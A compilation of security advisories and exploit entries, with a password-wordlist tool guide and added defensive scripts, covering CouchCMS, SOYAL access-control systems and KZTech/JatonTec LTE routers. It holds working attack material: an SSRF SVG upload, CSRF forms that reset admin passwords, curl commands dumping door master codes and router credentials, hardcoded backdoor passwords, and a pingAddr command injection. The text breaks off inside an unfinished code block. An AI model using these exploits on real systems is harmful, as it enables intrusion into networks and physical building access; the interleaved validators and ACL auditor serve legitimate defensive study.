An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows SSRF via an /couch/includes/kcfinder/browse.php SVG upload.

Upload URL: /couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en

ssrf.svg content:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
   <image height="200" width="200" xlink:href="http://<test_ip>:1234" />
</svg>
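Both CouchCMS advisories (the XSS one earlier on this page and the SSRF one above) come down to the same upload-handler gap: an SVG is XML, so it can carry `<script>` and it can reference remote resources. The validator below is an added example, not CouchCMS or KCFinder code; it parses a candidate upload with the standard library and lists the reasons to refuse it (scripting elements and event handlers for the XSS case, non-fragment `href`/`xlink:href` references for the SSRF case, entity declarations as an XXE precaution). The three SVG bodies are constructed samples: the first two follow the advisories' files, with a documentation IP standing in for `<test_ip>`, which is not valid XML inside an attribute.

```python
"""Reject SVG uploads that carry script or external references.

Added example, not CouchCMS/KCFinder code. Run the checks before storing
any user-supplied SVG, or convert the file to a raster format instead.
"""
import xml.etree.ElementTree as ET

# Elements that execute or embed active content inside an SVG
ACTIVE_TAGS = {"script", "foreignobject", "set", "animate"}


def _local(name):
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1]


def svg_upload_problems(data):
    """Return the reasons to reject the SVG bytes; an empty list means the
    file passed every check here."""
    problems = []
    if b"<!ENTITY" in data:
        problems.append("DTD entity declaration (XXE risk)")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return ["malformed XML: %s" % exc]
    if _local(root.tag).lower() != "svg":
        problems.append("root element is not <svg>")
    for el in root.iter():
        tag = _local(el.tag).lower()
        if tag in ACTIVE_TAGS:
            problems.append("active content element <%s>" % tag)
        for attr, value in el.attrib.items():
            a = _local(attr).lower()
            v = value.strip().lower()
            if a.startswith("on"):
                problems.append("event handler attribute %s on <%s>" % (a, tag))
            elif a == "href" and not v.startswith("#"):
                # href and xlink:href both arrive as local name "href"; anything
                # but a same-document fragment is an outbound fetch on render
                problems.append("external reference in <%s> %s=%s" % (tag, a, value.strip()))
            elif v.startswith("javascript:") or "url(" in v:
                problems.append("URL in attribute %s on <%s>" % (a, tag))
    return problems


def is_safe_svg(data):
    return not svg_upload_problems(data)


# Constructed sample 1: the xss.svg body from the XSS advisory
XSS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(document.cookie);</script>
</svg>"""

# Constructed sample 2: the ssrf.svg body, with 198.51.100.7 standing in for <test_ip>
SSRF_SVG = b"""<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
  <image height="200" width="200" xlink:href="http://198.51.100.7:1234" />
</svg>"""

# Constructed sample 3: a plain drawing that should be accepted
CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="50" height="50">
  <polygon points="0,0 0,50 50,0" fill="#009900"/>
</svg>"""

if __name__ == "__main__":
    for name, body in (("xss.svg", XSS_SVG), ("ssrf.svg", SSRF_SVG), ("clean.svg", CLEAN_SVG)):
        print(name, svg_upload_problems(body) or "accepted")
```

Serving accepted files with `Content-Disposition: attachment` and a restrictive Content-Security-Policy is the usual second layer, since a rejection list can never be complete.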
-
Title: crunch detailed guide
Crunch

In penetration testing and brute-force cracking of every kind we need a variety of password dictionaries. The dictionaries on GitHub are diverse, but none of them quite suit you. So how do you make your own dictionary file? Crunch is a tool written in C that creates customizable word lists. This article explains the use of Crunch in detail.

Installation

Crunch is installed on Kali Linux by default. On other apt-based systems it can be installed with:

apt-get install crunch

Running crunch to generate a dictionary requires the minimum and maximum length of the words to be generated and an output file. By default it uses the lowercase alphabet as the character set.

Example 1: generate words with a minimum length of 1 and a maximum length of 3.

crunch 1 3 -o kali.txt

Custom letters and numeric characters

Of course, we can combine letters and numbers, as follows:

crunch 5 7 pass123 -o kali.txt

Description: permute and combine the seven characters p a s s 1 2 3 to generate a dictionary with words between 5 and 7 characters long.

Create a dictionary with placeholders (-t)

@ : inserts lowercase characters
, : inserts uppercase characters
% : inserts numbers
^ : inserts symbols

Fixed word + 3 numbers

Suppose we want to fix the first 3 letters as bbs and fill the last 3 positions of each 6-character word with random digit combinations. We do this by specifying a pattern:

crunch 6 6 -t bbs%%% -o num.txt

Fixed word + 3 capital letters

Suppose we want to fix the first 3 letters as bbs and fill the last 3 positions of each 6-character word with random capital letters. This is done as follows:

crunch 6 6 -t bbs,,, -o kali.txt

Fixed word + 3 lowercase letters

crunch 6 6 -t bbs@@@ -o kali.txt

Fixed word + 3 symbols

crunch 6 6 -t bbs^^^ -o kali.txt

Lowercase letter (a, b or c) + digit (1, 2 or 3) + symbol (any)

In the following example, abc and 123 are used together with the + operator. We want a dictionary where the first character is a lowercase letter, the second a digit and the third a symbol, but only a, b or c for the letter, only 1, 2 or 3 for the digit, and any symbol in the last position. The command is:

crunch 3 3 abc + 123 -t @%^ -o kali.txt

Two digits (1, 2 or 3) + lowercase letter (any) + symbol (any)

Similarly, to create a 4-character pattern per word of 2 digits (only 1, 2 or 3) + a lowercase letter + a symbol:

crunch 4 4 + + 123 + -t %%@^ -o kali.txt

Here the two leading + signs are placeholders: crunch takes its character sets positionally (lowercase, uppercase, digits, symbols), and + keeps the default for that position.

Compressed word list

Word lists in text format are usually very large; gzip can compress them by 60-70%.

crunch 4 7 Pass123 -z gzip -o START
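The useful number on the defender's side is how big a pattern's search space is, since that is what a password policy is really setting. The following is an added example, not part of crunch: it implements the placeholder semantics described above (`@` lowercase, `,` uppercase, `%` digit, `^` symbol, `+` for a default set in the positional arguments) so a pattern can be expanded or just counted. The 33-character default symbol set is an assumption matching crunch's default; pass your own if yours differs.

```python
"""Expand or count a crunch-style -t pattern.

Added example, not crunch code. SYMBOLS is assumed to match crunch's
default symbol set (33 characters); everything else follows the
placeholder rules described on this page.
"""
import itertools
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase
DIGITS = string.digits
SYMBOLS = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ "  # assumed crunch default

PLACEHOLDERS = {"@": "lower", ",": "upper", "%": "digits", "^": "symbols"}


def charsets_from_args(args):
    """Map crunch's positional charset arguments (lower upper digits symbols)
    to keyword arguments; '+' or a missing argument keeps the default."""
    names = ["lower", "upper", "digits", "symbols"]
    defaults = [LOWER, UPPER, DIGITS, SYMBOLS]
    out = {}
    for name, default, arg in itertools.zip_longest(names, defaults, args[:4]):
        out[name] = default if arg in (None, "+") else arg
    return out


def position_choices(pattern, lower=LOWER, upper=UPPER, digits=DIGITS, symbols=SYMBOLS):
    """For each pattern position, the characters that may occupy it:
    a placeholder maps to its set, any other character stands for itself."""
    sets = {"lower": lower, "upper": upper, "digits": digits, "symbols": symbols}
    return [sets[PLACEHOLDERS[c]] if c in PLACEHOLDERS else c for c in pattern]


def expand_pattern(pattern, **charsets):
    """Yield every word the pattern denotes (only sensible for small spaces)."""
    for combo in itertools.product(*position_choices(pattern, **charsets)):
        yield "".join(combo)


def keyspace_size(pattern, **charsets):
    """Number of words the pattern denotes, without generating them."""
    n = 1
    for choices in position_choices(pattern, **charsets):
        n *= len(choices)
    return n


if __name__ == "__main__":
    # the three pattern commands from the guide above
    print("bbs%%%                      ->", keyspace_size("bbs%%%"))
    print("abc + 123 -t @%^            ->", keyspace_size("@%^", **charsets_from_args(["abc", "+", "123"])))
    print("+ + 123 + -t %%@^           ->", keyspace_size("%%@^", **charsets_from_args(["+", "+", "123", "+"])))
    print("first words of bbs%% (1,2):   ", list(expand_pattern("bbs%%", digits="12")))
```

Dividing `keyspace_size()` by the guess rate an attacker can sustain against your service gives the time a policy buys; a pattern whose whole space fits in a few minutes of offline hashing is not a policy.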
-
SOYAL 701 Server 9.0.1 - Insecure Permissions
# Exploit Title: SOYAL 701 Server 9.0.1 - Insecure Permissions
# Date: 25.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com

Vendor: SOYAL Technology Co., Ltd
Product web page: https://www.soyal.com.tw | https://www.soyal.com
Affected version: 9.0.1 190322
                  8.0.6 181227

Summary: 701 Server is the program used to set up and configure LAN and IP based access control systems, from the COM port used to the quantity and type of controllers connected. It is also used for programming some of the more complex controllers such as the AR-716E and the AR-829E.

Desc: The application suffers from an elevation of privileges vulnerability which can be used by a simple authenticated user that can change the executable file with a binary of choice. The vulnerability exists due to the improper permissions, with the 'F' flag (Full) for the 'Everyone' and 'Authenticated Users' groups.

Tested on: Microsoft Windows 10 Enterprise

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5633
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5633.php

25.01.2021

--

C:\Program Files (x86)\701Server>cacls McuServer.exe
C:\Program Files (x86)\701Server\McuServer.exe Everyone:F
                                               NT AUTHORITY\Authenticated Users:(ID)F
                                               NT AUTHORITY\SYSTEM:(ID)F
                                               BUILTIN\Administrators:(ID)F
                                               BUILTIN\Users:(ID)R
                                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
                                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files (x86)\701Server>
-
SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF
# Exploit Title: SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF
# Date: 25.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com

Vendor: SOYAL Technology Co., Ltd
Product web page: https://www.soyal.com.tw | https://www.soyal.com
Affected version: AR-727 i/CM - F/W: 5.0
                  AR837E/EF - F/W: 4.3
                  AR725Ev2 - F/W: 4.3 191231
                  AR331/725E - F/W: 4.2
                  AR837E/EF - F/W: 4.1
                  AR-727CM /i - F/W: 4.09
                  AR-727CM /i - F/W: 4.06
                  AR-837E - F/W: 3.03

Summary: Soyal Access systems are built into Raytel Door Entry Systems and are providing access and lift control to many buildings from public and private apartment blocks to prestigious public buildings.

Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Tested on: SOYAL Technology WebServer 2.0
           SOYAL Serial Device Server 4.03A
           SOYAL Serial Device Server 4.01n
           SOYAL Serial Device Server 3.07n

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5632
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5632.php

25.01.2021

--

<html>
  <body>
    <form action="http://192.168.1.1/userset.cgi" method="POST">
      <input type="hidden" name="pw" value="test123" />
      <input type="hidden" name="pw2" value="test123" />
      <input type="submit" value="Forge me!" />
    </form>
  </body>
</html>

...

<html>
  <body>
    <form action="http://192.168.1.2/LoginUser.cgi" method="POST">
      <input type="hidden" name="pw" value="drugtest123" />
      <input type="hidden" name="pw2" value="drugtest123" />
      <input type="submit" value="Forge me!" />
    </form>
  </body>
</html>
-
SOYAL Biometric Access Control System 5.0 - Master Code Disclosure
# Exploit Title: SOYAL Biometric Access Control System 5.0 - Master Code Disclosure
# Date: 25.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com

Vendor: SOYAL Technology Co., Ltd
Product web page: https://www.soyal.com.tw | https://www.soyal.com
Affected version: AR-727 i/CM - F/W: 5.0
                  AR837E/EF - F/W: 4.3
                  AR725Ev2 - F/W: 4.3 191231
                  AR331/725E - F/W: 4.2
                  AR837E/EF - F/W: 4.1
                  AR-727CM /i - F/W: 4.09
                  AR-727CM /i - F/W: 4.06
                  AR-837E - F/W: 3.03

Summary: Soyal Access systems are built into Raytel Door Entry Systems and
are providing access and lift control to many buildings from public and
private apartment blocks to prestigious public buildings.

Desc: The controller suffers from a cleartext transmission of sensitive
information. This allows interception of the HTTP traffic and disclosure of
the Master code and the Arming code via a man-in-the-middle attack. An
attacker can obtain these codes to enter into the controller's Programming
mode and bypass physical security controls in place.

Tested on: SOYAL Technology WebServer 2.0
           SOYAL Serial Device Server 4.03A
           SOYAL Serial Device Server 4.01n
           SOYAL Serial Device Server 3.07n

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5630
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5630.php

25.01.2021

--

$ curl 'http://192.168.1.1/CtrlParam.htm' \
  -H 'Authorization: Basic YWRtaW46' | \
  grep -ni -B1 'masterCode\|armCode'

<td><font face="Arial,Helvetica">Master Code (6 Digital) </font></td>
<td colspan="2"><input type=text name="masterCode" size=6 maxlength=6 value=123456></td></tr>
<td>Arming Code (4 Digital) </td>
<td colspan="2"><input type=text name="armCode" size=4 maxlength=4 value=1234></td></tr>
-
SOYAL 701 Client 9.0.1 - Insecure Permissions
# Exploit Title: SOYAL 701 Client 9.0.1 - Insecure Permissions
# Date: 25.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com

Vendor: SOYAL Technology Co., Ltd
Product web page: https://www.soyal.com.tw | https://www.soyal.com
Affected version: 9.0.1 190410
                  9.0.1 190115

Summary: 701 Client is the user interface software for the access control
system. It is used for adding and deleting tokens, setting door groups for
access, setting time zones for limiting access and monitoring ingress and
egress on a live system, among other things.

Desc: The application suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user that can change the
executable file with a binary of choice. The vulnerability exists due to the
improper permissions, with the 'F' flag (Full) for 'Authenticated Users'
group.

Tested on: Microsoft Windows 10 Enterprise

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5634
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5634.php

25.01.2021

--

C:\Program Files (x86)\701Client>cacls client.exe
C:\Program Files (x86)\701Client\client.exe NT AUTHORITY\Authenticated Users:F
                                            NT AUTHORITY\Authenticated Users:(ID)F
                                            NT AUTHORITY\SYSTEM:(ID)F
                                            BUILTIN\Administrators:(ID)F
                                            BUILTIN\Users:(ID)R
                                            APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
                                            APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files (x86)\701Client>
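The 701 Server and 701 Client findings above come down to the same ACL condition, so one added audit script serves both (it is not SOYAL's or the advisory author's code). It parses cacls listings laid out as the two quoted above and flags every ACE that grants Full, Change or Write to a group every local user belongs to; the two listings are embedded verbatim as sample input. The principal names and right letters are standard cacls output; the assumption that the path ends at its file extension on the first line is noted in the code.

```python
"""Audit cacls output for ACEs that let any local user overwrite an executable.

Added example, not part of the advisories: it parses the two cacls listings
quoted above and reports the entries that make the binaries replaceable by
low-privilege accounts. Principal names and right letters are standard
Windows values; the line layout is assumed from the listings as printed.
"""
import re

# Groups every interactive local account belongs to (spelled as cacls prints them).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
    r"builtin\users",
}

# cacls short rights that permit modifying the file: Full, Change, Write.
WRITE_RIGHTS = {"F", "C", "W"}

# "<principal>:<inheritance flags><right>", e.g. "NT AUTHORITY\Authenticated Users:(ID)F"
ACE_RE = re.compile(r"^(?P<who>[^:]+?):(?P<flags>(?:\([A-Z]+\))*)(?P<right>[FCRWN])?\s*$")
# First line of a listing: "<path> <first ACE>"; assumed: the path ends at its extension.
FIRST_LINE_RE = re.compile(r"^(?P<path>[A-Za-z]:\\.+?\.\w+)\s+(?P<ace>\S.*)$")
# A cmd.exe prompt such as "C:\Program Files (x86)\701Server>" (with or without a command).
PROMPT_RE = re.compile(r"^[A-Za-z]:\\[^>]*>")


def parse_cacls(output: str):
    """Return (path, [(principal, flags, right), ...]) from one cacls listing."""
    path, aces = None, []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or PROMPT_RE.match(line):
            continue  # blank line or the prompt/command line itself
        if path is None:
            m = FIRST_LINE_RE.match(line)
            if not m:
                raise ValueError(f"unexpected first line: {line!r}")
            path, line = m.group("path"), m.group("ace")
        m = ACE_RE.match(line)
        if m:
            aces.append((m.group("who"), m.group("flags"), m.group("right")))
    return path, aces


def risky_aces(aces):
    """ACEs granting write-class rights to a group that every local user is in."""
    return [(who, flags, right) for who, flags, right in aces
            if who.lower() in LOW_PRIV_PRINCIPALS and right in WRITE_RIGHTS]


def audit_listing(output: str) -> dict:
    path, aces = parse_cacls(output)
    return {"path": path, "risky": risky_aces(aces)}


# The two listings from the advisories above, pasted verbatim as sample input.
SAMPLE_701SERVER = r"""
C:\Program Files (x86)\701Server>cacls McuServer.exe
C:\Program Files (x86)\701Server\McuServer.exe Everyone:F
                                               NT AUTHORITY\Authenticated Users:(ID)F
                                               NT AUTHORITY\SYSTEM:(ID)F
                                               BUILTIN\Administrators:(ID)F
                                               BUILTIN\Users:(ID)R
                                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
                                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files (x86)\701Server>
"""

SAMPLE_701CLIENT = r"""
C:\Program Files (x86)\701Client>cacls client.exe
C:\Program Files (x86)\701Client\client.exe NT AUTHORITY\Authenticated Users:F
                                            NT AUTHORITY\Authenticated Users:(ID)F
                                            NT AUTHORITY\SYSTEM:(ID)F
                                            BUILTIN\Administrators:(ID)F
                                            BUILTIN\Users:(ID)R
                                            APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
                                            APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files (x86)\701Client>
"""

if __name__ == "__main__":
    for sample in (SAMPLE_701SERVER, SAMPLE_701CLIENT):
        result = audit_listing(sample)
        for who, flags, right in result["risky"]:
            print(f"{result['path']}: {who} has {flags}{right}")
```

Feed it cacls output captured from the install directory; a non-empty risky list means any local account can replace the binary that later runs with higher privileges. The remediation is to drop the write-class entries for those groups so that only Administrators and SYSTEM can modify the files (the (ID) entries are inherited from the directory, so the directory ACL needs the same treatment).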
-
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/
Affected version: Model    | Firmware
                  ---------|-----------
                  JT3500V  | 2.0.1B1064
                  JT3300V  | 2.0.1B1047
                  AM6200M  | 2.0.0B3210
                  AM6000N  | 2.0.0B3042
                  AM5000W  | 2.0.0B3037
                  AM4200M  | 2.0.0B2996
                  AM4100V  | 2.0.0B2988
                  AM3500MW | 2.0.0B1092
                  AM3410V  | 2.0.0B1085
                  AM3300V  | 2.0.0B1060
                  AM3100E  | 2.0.0B981
                  AM3100V  | 2.0.0B946
                  AM3000M  | 2.0.0B21
                  KZ7621U  | 2.0.0B14
                  KZ3220M  | 2.0.0B04
                  KZ3120R  | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE
product specially designed to enable quick and easy LTE fixed data service
deployment for residential and SOHO customers. It provides high speed LAN,
Wi-Fi and VoIP integrated services to end users who need both bandwidth and
multi-media data service in residential homes or enterprises. The device has
2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall
software for security. It provides an effective all-in-one solution to SOHO or
residential customers. It can deliver up to 1Gbps max data throughput which
can be very competitive to wired broadband access service.

Desc: The device has several backdoors and hidden pages that allow remote code
execution, overwriting of the bootrom and enabling debug mode.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5639
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php

03.02.2021

--

Older and newer models differ in backdoor code. By navigating to /syscmd.html
or /syscmd.asp pages an attacker can authenticate and execute system commands
with highest privileges.

Old models (syscmd.asp) password: super1234
Newer models (syscmd.html) password: md5(WAN_MAC+version):

$ curl -k https://192.168.1.1/goform/getImgVersionInfo
{"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]}

...
    pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR");
    if (*pcVar6 == 0) {
      pcVar6 = "6C:AD:EF:00:00:01";
    }
    memset(acStack280,0,0x100);
    sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210");
...
    psMd5Init(auStack112);
    psMd5Update(auStack112,local_10,local_c);
    psMd5Final(auStack112,uParm1);
    return;
...

Another 2 backdoors exist using the websCheckCookie() and specific header strings.

...
    iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb);
    if (iVar2 != 0) {
      return 0xffffffff;
    }
    if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) &&
       (iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) {
      return 0xffffffff;
...
    if (iVar1 != 0) goto LAB_0047c304;
LAB_0047c32c:
    WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1);
LAB_0047c35c:
    __n = strlen(__s1);
    if (__n == 0) {
      snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log");
      WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560);
      system(acStack1560);
      websWrite(iParm1,"invalid command!");
      goto LAB_0047c3f8;
    }
...

Bypass the backdoor password request and enable debug mode from within the web console:

$('#div_check').modal('hide');     <--- syscmd.html
g_password_check_alert.close();    <--- syscmd.asp
-
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/
Affected version: Model    | Firmware
                  ---------|-----------
                  JT3500V  | 2.0.1B1064
                  JT3300V  | 2.0.1B1047
                  AM6200M  | 2.0.0B3210
                  AM6000N  | 2.0.0B3042
                  AM5000W  | 2.0.0B3037
                  AM4200M  | 2.0.0B2996
                  AM4100V  | 2.0.0B2988
                  AM3500MW | 2.0.0B1092
                  AM3410V  | 2.0.0B1085
                  AM3300V  | 2.0.0B1060
                  AM3100E  | 2.0.0B981
                  AM3100V  | 2.0.0B946
                  AM3000M  | 2.0.0B21
                  KZ7621U  | 2.0.0B14
                  KZ3220M  | 2.0.0B04
                  KZ3120R  | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE
product specially designed to enable quick and easy LTE fixed data service
deployment for residential and SOHO customers. It provides high speed LAN,
Wi-Fi and VoIP integrated services to end users who need both bandwidth and
multi-media data service in residential homes or enterprises. The device has
2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall
software for security. It provides an effective all-in-one solution to SOHO or
residential customers. It can deliver up to 1Gbps max data throughput which
can be very competitive to wired broadband access service.

Desc: The application suffers from an authentication bypass vulnerability. An
unauthenticated attacker can disclose sensitive and clear-text information
resulting in authentication bypass by downloading the configuration of the
device and revealing the admin password.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5636
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5636.php

03.02.2021

--

$ curl -s \
  -o configtest.zlib \                                         # Default: config.dat
  'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \
  binwalk -e configtest.zlib ; \
  cd _configtest.zlib_extracted ; \
  strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \    # cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \
                                                               # On device
  cd ..
3:Login=admin
4:Password=neotelwings
5:TelnetPwd=root123
6:GuestId=user
7:GuestPassword=user123
89:DDNSPassword=
239:auto_update_password=
279:Tr069_Password=
288:Tr069_ConnectionRequestPassword=admin
300:Tr069_STUNPassword=
339:telnetManagement=2
$
-
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/
Affected version: Model    | Firmware
                  ---------|-----------
                  JT3500V  | 2.0.1B1064
                  JT3300V  | 2.0.1B1047
                  AM6200M  | 2.0.0B3210
                  AM6000N  | 2.0.0B3042
                  AM5000W  | 2.0.0B3037
                  AM4200M  | 2.0.0B2996
                  AM4100V  | 2.0.0B2988
                  AM3500MW | 2.0.0B1092
                  AM3410V  | 2.0.0B1085
                  AM3300V  | 2.0.0B1060
                  AM3100E  | 2.0.0B981
                  AM3100V  | 2.0.0B946
                  AM3000M  | 2.0.0B21
                  KZ7621U  | 2.0.0B14
                  KZ3220M  | 2.0.0B04
                  KZ3120R  | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE
product specially designed to enable quick and easy LTE fixed data service
deployment for residential and SOHO customers. It provides high speed LAN,
Wi-Fi and VoIP integrated services to end users who need both bandwidth and
multi-media data service in residential homes or enterprises. The device has
2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall
software for security. It provides an effective all-in-one solution to SOHO or
residential customers. It can deliver up to 1Gbps max data throughput which
can be very competitive to wired broadband access service.

Desc: The application suffers from an authenticated OS command injection
vulnerability. This can be exploited to inject and execute arbitrary shell
commands through the 'pingAddr' HTTP POST parameter bypassing the injection
protection filter.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5635
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php

03.02.2021

--

#JT3300V/AM3300V

lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
  --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
  -H "Cookie: kz_userid=admin:311139" \
  -H "X-Requested-With: XMLHttpRequest"
ping: bad address 'Linux'
lqwrm@metalgear:~/prive$

#JT3500V

lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
  --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
  -H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \
  -H "X-Requested-With: XMLHttpRequest"
ping: bad address 'Linux'
lqwrm@metalgear:~/prive$
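The finding above is a filter that the $(uname) value passes through the pingAddr parameter. As an added Python example (not the device's firmware), this shows the two-part fix a defender wants: an allowlist that accepts only an IP address or a syntactically valid hostname for the target, and a ping invocation built as an argv list with no shell in the path, so nothing the client sends is ever interpreted. The parameter names follow the advisory's request; the option ranges and the ping flags are assumptions.

```python
"""Allowlist validation for a ping-target parameter, executed without a shell.

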